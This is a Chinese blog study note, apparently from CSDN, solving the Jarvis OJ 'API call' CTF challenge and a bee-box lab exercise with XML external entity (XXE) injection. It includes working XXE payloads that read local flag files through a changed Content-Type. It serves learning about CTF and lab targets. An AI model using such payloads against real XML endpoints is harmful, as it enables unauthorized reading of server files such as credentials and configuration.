[Jarvis OJ]–api调用–XXE漏洞学习笔记

最新推荐文章于 2025-04-09 20:17:25 发布
最新推荐文章于 2025-04-09 20:17:25 发布
阅读量2.9k 收藏 5
点赞数
分类专栏: ctf 学习笔记 web安全 文章标签: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zpy1998zpy/article/details/80918975
版权

题目地址:http://web.jarvisoj.com:9882/

查看网页源码:

可以看到我们点击go后,以json的形式发送了数据。抓包:

 

我们看到,其实我们输入的内容并没有发送到服务器,而是发送了几个特定的值。

这题的提示是查看flag文件,用到的是XXE漏洞,有几篇原理文章参考一下:

https://security.tencent.com/index.php/blog/msg/69

http://www.freebuf.com/articles/web/126788.html

http://www.mottoin.com/92794.html

XXE漏洞就是服务器接受从客户端发送来的xml格式数据时,xml数据中恶意的引用了外部实体,将它的值绑定为服务器的目标文件,这样在服务器返回给我们解析后的值时,就会把目标文件的内容返回给我们,我们就读取了敏感文件。

但是这道题目,默认的是json格式传递,因此首先我们更改Content-Type的值为application/xml,然后传入xml代码:

<?xml version=”1.0″?>
<!DOCTYPE abcd[
<!ENTITY any SYSTEM "file:///home/ctf/flag.txt">]>

<something>&any;</something>

 

得到flag

为了进一步理解xxe漏洞的使用,我有在beebox测试环境中进行了测试,我在文件/home/bee/ctf/falg.txt中写入了hellowbabyclark,现在的目标是读取到这个文件的内容,打开xxe漏洞测试的首页:

 

点击按钮抓包:

 

可以看出是服务器对<reset><login>的位置的内容解析后返还给浏览器显示,所以我们只要在这个位置写入外部实体引用即可:

<?xml version=”1.0″?>
<!DOCTYPE a[
<!ENTITY xxe SYSTEM “file:///home/bee/ctf/flag.txt”>
]>

<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>

Got it!

 

大概就先学习这么多吧,写到这道xxe漏洞的题目时,微信的XXE漏洞刚刚被报出来,有兴趣的可以看下,xxe部分基本就是这个原理。

后天考数据结构,最后一门啦!!!

 

文章同步到我的博客: http://www.zjzhhb.com/archives/454

转载指明出处

 

PHPINFO(jarvisoj)
Mikasa
04-19 901
今天做题的时候做了这一道。。刷新了对反序列化的认识。。 这道题考察了关于session序列化选择器的漏洞。。 参考文章:https://www.jb51.net/article/107101.htm 首先先介绍一下,关于session反序列化的三种机制: 首先在php.ini中关于session的设置: session.save_path="" #设置session的储存路径 sess...
XXE漏洞
qi_SJQ_的博客
01-21 656
概念 全称XML External Entity Injection, 即xml外部实体注入漏洞,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口 扫描、攻击内网网站等危害。 了解一些xml,我们知道xml是一种数据存储类型,用于传输,而html用于显示。 XML被设计为数据和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可 选)、文档元素,其焦点是数据传输工具。 自己当初的学习笔记 XML与HTML的主要差异: XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设.
Jarvis OJ API调用
沐目的博客
10-15 651
XXE任意文件读取 一、知识点 1.XML(可扩展标记语言) XML叫可扩展标记语言,是一种很像HTML的标记语言。但XML 的设计宗旨是传输数据,而不是显示数据。我理解的是一直传输数据的格式,把要传输的数据放在一个个自己定义的标签里,至于为什么要用这种格式传输,我就不知道了。 也许这有点难以理解,但是 XML 不会做任何事情。XML 被设计用来结构化、存储以及传输信息。 下面实例是 Jani 写...
使用api接口进行调用(附案例,多种语言均可实现)
最新发布
weixin_68910258的博客
04-09 2196
我自己的理解(可能有误,啊哈哈哈哈)就是为了使各大开发者更快完成一个项目功能,api功能开发商提供一个调用地址,每次访问(调用),返回给开发者想要的信息。作为开发者,对于一些复杂的功能,直接采用接口调用方式访问,这样好像更快;对于提供者,编写出来的功能,是不想直接将代码提供给开发者的,所以就开发出了接口,提供给开发者,这样既方便也避免了背后代码的暴露。
XXE漏洞学习笔记
dbhri9673的博客
08-24 450
导读 1.XML基础知识 2.DTD基础知识-定义-内外DTD声明-优势 3.DTD基础知识-元素 4.DTD基础知识-实体-外部实体支持协议 5.XXE漏洞原理-有回显和无回显漏洞利用 6.其他危害-payload 7.检测和防御 1.XML基础知识 1.1XML定义: XML 指可扩展标记语言(ExtensibleMarkupLanguage...
Jarvis OJ Struts2漏洞
zip471642048的博客
07-05 281
附件地址 : https://dn.jarvisoj.com/challengefiles/struts2.rar.5b541c4760bb277b0853ec59e8726e86 使用strings 查找 flag关键字 直接就找到了 ,然后水一下字数hahah
jarvis-api:JARVIS系统的API部分
05-16
jarvis-api [WIP] JARVIS:只是一个非常智能的系统 该项目是JARVIS系统的API部分。 它是用于管理您的忙碌生活的各种插件的集合。 (将用于UI前端。) 安装 您将需要来运行服务器。 安装完成后,在项目文件夹中运行npm install以安装节点模块。 用法 DEBUG=jarvis-api: * npm start 配置 您应该至少配置了一个插件。 在config文件夹内添加一个local.yaml ,其中包含要使用的每个服务的部分,例如: plugins : ToRead : type : ericsBookmarks url : http://example.com/toreadapi.php Trello : type : trello key : 0eec1ed0c34e3e58d7f9d50016f952dc
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
youngerll的博客
01-02 1098
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
xxe漏洞案例2-在线靶场jarvisoj:9882
c0529的博客
05-04 340
网址。
Jarvisoj_Simple Injection
一只迂腐子
03-04 1518
Simple Injection - 167 SOLVERS - 350 WEB 很简单的注入,大家试试? 题目入口:http://web.jarvisoj.com:32787/ 题目来源:ISCC2016 访问页面之后,得到就是一个登陆页面。通过burp进行抓包,发现在响应头或者是页面中含有提示信息,那么就说明这的确是一个普通的登陆型的SQL注入漏洞了。 常见的登陆漏洞类型 ...
记录遇到的有趣的CTF题---simple_api(xxe漏洞)
tothemoon的博客
11-05 2339
这是我参加的一场校内的CTF比赛。大佬们的write up还在整理当中,我就先用我之前做题时的截图做一个简单的复现。write up出来后再查漏补缺。 1.打开网站后除了这个啥也没有,查看源代码也没有提示。 学过python的同学应该会发现这一段字典,但在这里的意思应该是响应错误,但仔细看了源码后也没与发现注入点,这时想到题目名为simple_api。 抓包添加xxe代码后就能跑出flag了。 x...
jarvisoj_web_witerup
残阳泼茶香的博客
03-17 565
PORT51 该题提示我们需要使用51端口进入该站点 然而此站为http://web.jarvisoj.com:32770/ 它的端口已经是确定了的,所以只能更改我们的port了。 本来用的是kali虚拟机,不能通过外网,命令如下 curl --local-port 51 http://web.jarvisoj.com:32770/ 自己试试,我就懒得弄win上的curl命令了 L...
Jarvis OJ - Baby's Crack - Writeup
baikeng3674的博客
07-14 211
Jarvis OJ - Baby's Crack - Writeup M4x原创,欢迎转载,转载请表明出处 这是我第一次用爆破的方法做reverse,值得记录一下 题目: 文件下载 分析: 下载后解压有exe和flag.enc两个文件,初步推测flag.enc是用exe加密后的文件,我们只需要分析exe的加密算法,还原flag.enc的明文即可 ...
hackthebox- Jarvis(考点:sql注入/mysql/systemct提权)不用sqlmap
冬萍子癸水
04-14 584
此靶机大多数人用的sqlmap。针对oscp,本文章未用sqlmap。其实现实场景中用sqlmap的也不多,会封IP的,不会让你扫来扫去。所以学习手工注入也很必要。在手工注入里也可以利用文件包含漏洞。 nmap 很常规,一开始又没ssh密码,当然是从80网页开始搜集信息。以及dirbuster扫它 发现phpadmin,但是没密码,继续看80 像这种改一个展示的东西,网址里的数字就变了一个,这...
Jarvis OJ babyphp
Yang_99的博客
08-01 220
babyphp 根据提示可知第一步是git源码泄露 我们用GitHack来获取源码分析 py -2 GitHack.py http://web.jarvisoj.com:32798/.git/ 得到的index.php中含有重要PHP代码 <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; assert(
Jarvis-OJ WEB 多题writeup
烟敛寒林的博客
04-19 4582
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾局的秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格S...
API安全学习笔记(常见攻击面)
m0_61869253的博客
02-19 1134
诸如apikey 或者随机生成的其他形式的token为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓👉优快云大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈​!
jarvis OJ web题目浅析
liguangyao213的博客
10-25 1156
近期刷到的不错的ctf平台,权当看个乐。
渗透测试-xxe之CTF考题实验及防御方法
lza20001103的博客
04-29 1738
xxe之CTF考题实验及防御方法
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值